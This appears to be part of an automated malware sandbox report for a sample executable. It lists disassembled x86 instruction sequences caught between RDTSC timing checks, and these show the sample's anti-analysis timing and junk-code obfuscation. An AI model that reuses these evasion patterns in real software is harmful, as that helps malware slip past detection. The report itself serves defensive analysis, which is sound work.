Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D75CB second address: 9D75E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F97B4F2EDCAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D75E1 second address: 9D75E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D7DF7 second address: 9D7E26 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F97B4F2EDCCh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F97B4F2EDD1h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DA225 second address: 9DA27B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F97B4EC49B8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 adc di, ED21h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e and edi, 364CD7DDh 0x00000034 pop esi 0x00000035 push eax 0x00000036 pushad 0x00000037 jo 00007F97B4EC49C3h 0x0000003d jmp 00007F97B4EC49BDh 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D9FBF second address: 9D9FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DA9B3 second address: 9DA9B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DA9B9 second address: 9DA9C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DB729 second address: 9DB72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD202 second address: 9DD20C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4F2EDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD20C second address: 9DD212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD212 second address: 9DD239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F97B4F2EDD4h 0x0000000f jng 00007F97B4F2EDCEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD8E6 second address: 9DD8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD8FA second address: 9DD8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3D2 second address: 9DE3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3D8 second address: 9DE3E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3E6 second address: 9DE3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3EA second address: 9DE3EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E1A82 second address: 9E1A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F97B4EC49C2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DEB60 second address: 9DEB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3807 second address: 9E380B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E380B second address: 9E3811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3811 second address: 9E381B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4EC49BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E381B second address: 9E3826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3826 second address: 9E382C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E382C second address: 9E3844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F97B4F2EDD1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3DB1 second address: 9E3DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3DB5 second address: 9E3DC7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E4D89 second address: 9E4D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E4D8D second address: 9E4DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F97B4F2EDD5h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F97B4F2EDDAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3FDE second address: 9E3FFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5DAB second address: 9E5DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F97B4F2EDD3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E4FF4 second address: 9E5010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5DC5 second address: 9E5E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 xor ebx, 0A68190Bh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F97B4F2EDC8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D295Dh] 0x00000030 mov dword ptr [ebp+122D1FDCh], edi 0x00000036 push 00000000h 0x00000038 adc ebx, 6013FA28h 0x0000003e push eax 0x0000003f pushad 0x00000040 jp 00007F97B4F2EDCCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5010 second address: 9E5016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5E13 second address: 9E5E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5016 second address: 9E501A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E6D98 second address: 9E6D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7D8F second address: 9E7D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7D95 second address: 9E7E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F97B4F2EDCEh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F97B4F2EDC8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, esi 0x0000002d xor dword ptr [ebp+122D1BA0h], ebx 0x00000033 push 00000000h 0x00000035 sbb bx, C96Bh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007F97B4F2EDC8h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 sbb bx, 021Ch 0x0000005b cmc 0x0000005c xchg eax, esi 0x0000005d push edx 0x0000005e js 00007F97B4F2EDDEh 0x00000064 jmp 00007F97B4F2EDD8h 0x00000069 pop edx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E6F97 second address: 9E6F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7E49 second address: 9E7E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E6F9D second address: 9E6FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7E4D second address: 9E7E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8D71 second address: 9E8D92 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4EC49C7h 0x00000008 jmp 00007F97B4EC49C1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8D92 second address: 9E8D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8073 second address: 9E8077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E8D96 second address: 9E8D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EA033 second address: 9EA041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EA041 second address: 9EA04B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0EC second address: 9EB0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0F0 second address: 9EB0F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0F6 second address: 9EB0FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB0FC second address: 9EB125 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007F97B4F2EDCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4F2EDD1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB125 second address: 9EB1C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 je 00007F97B4EC49B9h 0x0000000e movzx edi, cx 0x00000011 mov dword ptr [ebp+122D2B35h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jp 00007F97B4EC49BBh 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D1C2Fh], ecx 0x00000032 jp 00007F97B4EC49BCh 0x00000038 popad 0x00000039 sub bx, 0184h 0x0000003e mov eax, dword ptr [ebp+122D1321h] 0x00000044 cld 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F97B4EC49B8h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000016h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 or edi, 4F229772h 0x00000067 nop 0x00000068 jmp 00007F97B4EC49BCh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 jmp 00007F97B4EC49C9h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1C7 second address: 9EB1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1CC second address: 9EB1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1D2 second address: 9EB1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EB1D6 second address: 9EB1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECE54 second address: 9ECE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECE72 second address: 9ECE76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECE76 second address: 9ECEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F97B4F2EDC8h 0x0000000c popad 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1D51h], ebx 0x00000014 push 00000000h 0x00000016 stc 0x00000017 push 00000000h 0x00000019 sub ebx, 13A32A90h 0x0000001f xchg eax, esi 0x00000020 jmp 00007F97B4F2EDD0h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007F97B4F2EDC8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9ECEB3 second address: 9ECEB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F0C45 second address: 9F0CA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F97B4F2EDCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D265Ah], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F97B4F2EDC8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push eax 0x00000030 pushad 0x00000031 mov dword ptr [ebp+12453AEDh], edi 0x00000037 mov dword ptr [ebp+122D1B8Eh], edx 0x0000003d popad 0x0000003e pop ebx 0x0000003f push 00000000h 0x00000041 jbe 00007F97B4F2EDCCh 0x00000047 add edi, dword ptr [ebp+1247AF6Ah] 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F0CA5 second address: 9F0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EEE96 second address: 9EEEB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F97B4F2EDCEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EEF60 second address: 9EEF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC0EF second address: 9EC0F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC0F5 second address: 9EC115 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F97B4EC49C1h 0x00000008 jmp 00007F97B4EC49BBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jnc 00007F97B4EC49B6h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC115 second address: 9EC18C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F97B4F2EDC6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor edi, 6F023801h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a call 00007F97B4F2EDCCh 0x0000001f pop edi 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 jmp 00007F97B4F2EDCFh 0x0000002c mov eax, dword ptr [ebp+122D0011h] 0x00000032 movsx ebx, bx 0x00000035 movzx edi, si 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F97B4F2EDC8h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a pop edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EFDD8 second address: 9EFDDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F1C07 second address: 9F1C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 je 00007F97B4F2EDC9h 0x0000000b mov bx, dx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F97B4F2EDC8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov di, si 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F97B4F2EDC8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1B22h], eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F97B4F2EDCCh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F1C71 second address: 9F1C77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F1C77 second address: 9F1C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9EC18C second address: 9EC1A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F97B4EC49BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F2E22 second address: 9F2E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F9449 second address: 9F944F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F944F second address: 9F9458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
